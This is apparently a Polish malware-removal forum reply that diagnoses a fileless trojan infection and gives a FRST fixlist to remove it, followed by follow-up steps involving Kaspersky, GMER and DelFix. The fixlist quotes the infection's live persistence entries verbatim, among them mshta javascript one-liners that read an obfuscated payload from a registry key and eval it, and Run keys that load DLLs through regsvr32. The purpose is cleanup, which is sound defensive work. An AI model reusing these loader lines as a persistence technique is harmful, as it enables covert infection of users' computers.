Jest tu infekcja i to grubszego kalibru niż Twój poprzedni problem z Google Chrome. W systemie działają trojany ładowane z miejsc maskowanych znakami null (wpisy są niewidoczne dla wielu narzędzi), w tym infekcja "bezplikowa" ładowana wprost z rejestru. Załączony tu plik FRST.txt jest nawet blokowany przez Windows Defender ze względu na te specjalne ciągi, ale log sam w sobie nie jest oczywiście "niebezpieczny". Natomiast BSODy wyglądają na odrębny problem i być może właśnie sprzętowy. Na szybko przejrzałam te pliki DMP i niespójne wyniki, ale tak jakby kręcące się wokół sprzętu (m.in. msahci.sys i nvlddmkm.sys są wyliczane jako przyczynowy sterownik). Akcja wstępna: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: (Microsoft Corporation) C:\Windows\explorer.exe HKU\S-1-5-21-813231136-3034751300-3063813572-1001\Software\Classes\f84341: mshta "javascript:eDvhqj2rc="B6ExoD";Z9s=new ActiveXObject("WScript.Shell");QCBCP2GB="4";eMU69v=Z9s.RegRead("HKCU\\software\\ynqlzjycy\\cilw");Sy0XO8impn="9lR";eval(eMU69v);Vkc9RSvI="gTED";" HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [**rkia] => mshta javascript:n4uaVOOu="5p";O3p=new%20ActiveXObject("WScript.Shell");Yz2gyJz="xLc5lUr";Ano3o=O3p.RegRead("HKCU\\software\\ynqlzjycy\\cilw");C6REIhse="J";eval(Ano3o);T4sWWTxwN="RLHc4j"; HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [**uzan] => "C:\Users\Pawcio\AppData\Local\67af67\9941b9.lnk" HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [Odvics] => C:\Users\Pawcio\AppData\Local\Odvics\tmp802C.exe [143918 2016-06-01] () HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [iksoft] => regsvr32.exe C:\Users\Pawcio\AppData\Local\Iksoft\jtxbikrl.dll HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [AXworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Pawcio\AppData\Local\Odvics\jtxbikrl.dll Task: {8657D7CA-AFC8-4C62-85F0-A83DE2E4D8D6} - System32\Tasks\{4D653D61-D83C-4579-ACA8-FB751AF29D98} => pcalua.exe -a "C:\Downloads\Sound Booster\Sound Booster.exe" -d "C:\Downloads\Sound Booster" DeleteKey: HKCU\Software\ynqlzjycy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Pawcio^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^339bc1.lnk DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Akamai NetSession Interface DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AXworks DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Iksoft DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Odvics DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins S3 usbbus; system32\DRIVERS\lgx64bus.sys [X] S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X] S3 USBModem; system32\DRIVERS\lgx64modem.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] S3 xspirit; \??\C:\Windows\xspirit.sys [X] C:\Users\Administrator C:\Users\HomeGroupUser$ C:\Users\Gość C:\Users\Pawcio\AppData\Local\{7EE9EBB6-D944-4670-A12B-6374FC4BDE72} C:\Users\Pawcio\AppData\Local\67af67 C:\Users\Pawcio\AppData\Local\CrashRpt C:\Users\Pawcio\AppData\Local\Iksoft C:\Users\Pawcio\AppData\Local\Odvics C:\Users\Pawcio\AppData\Roaming\Introvert.J C:\Users\Pawcio\AppData\Roaming\Registry.dll C:\Users\Pawcio\AppData\Roaming\Temporary.5 C:\Users\Pawcio\AppData\Roaming\d0ef40 C:\Users\Pawcio\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9 C:\Users\Pawcio\AppData\Roaming\vlc C:\Users\Pawcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk C:\Users\Pawcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Google Chrome.lnk C:\Users\UpdatusUser C:\Windows\pss\339bc1.lnk.Startup CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Odinstaluj Kaspersky Internet Security, skoro trial wygasł. Następnie zastosuj jeszcze narzędzie Kaspersky Remover. 3. Zrób nowy log FRST z opcji Skanuj (Scan), z Addition i Shortcut, oraz zaległy obowiązkowy GMER. Dołącz też plik fixlog.txt.

1. Jeśli w raporcie FRST nadal stoją uprzednio wyliczane adesy IP, to w tym przypadku należy je usunąć za pomocą skryptu FRST o następującej treści: Tcpip\..\Interfaces\{2befaa59-b503-41a5-b440-dbe37f5150d1}: [DhcpNameServer] 82.163.142.7 Tcpip\..\Interfaces\{2c61f513-5bf8-43de-ae23-6e95e8d38452}: [DhcpNameServer] 82.163.142.7 Tcpip\..\Interfaces\{97517553-d50d-4c34-af9e-feb4b699f5e4}: [DhcpNameServer] 82.163.142.7 2. Na koniec usuń z Pulpitu folder frst (o ile już tego nie zrobiłeś) oraz zastosuj DelFix.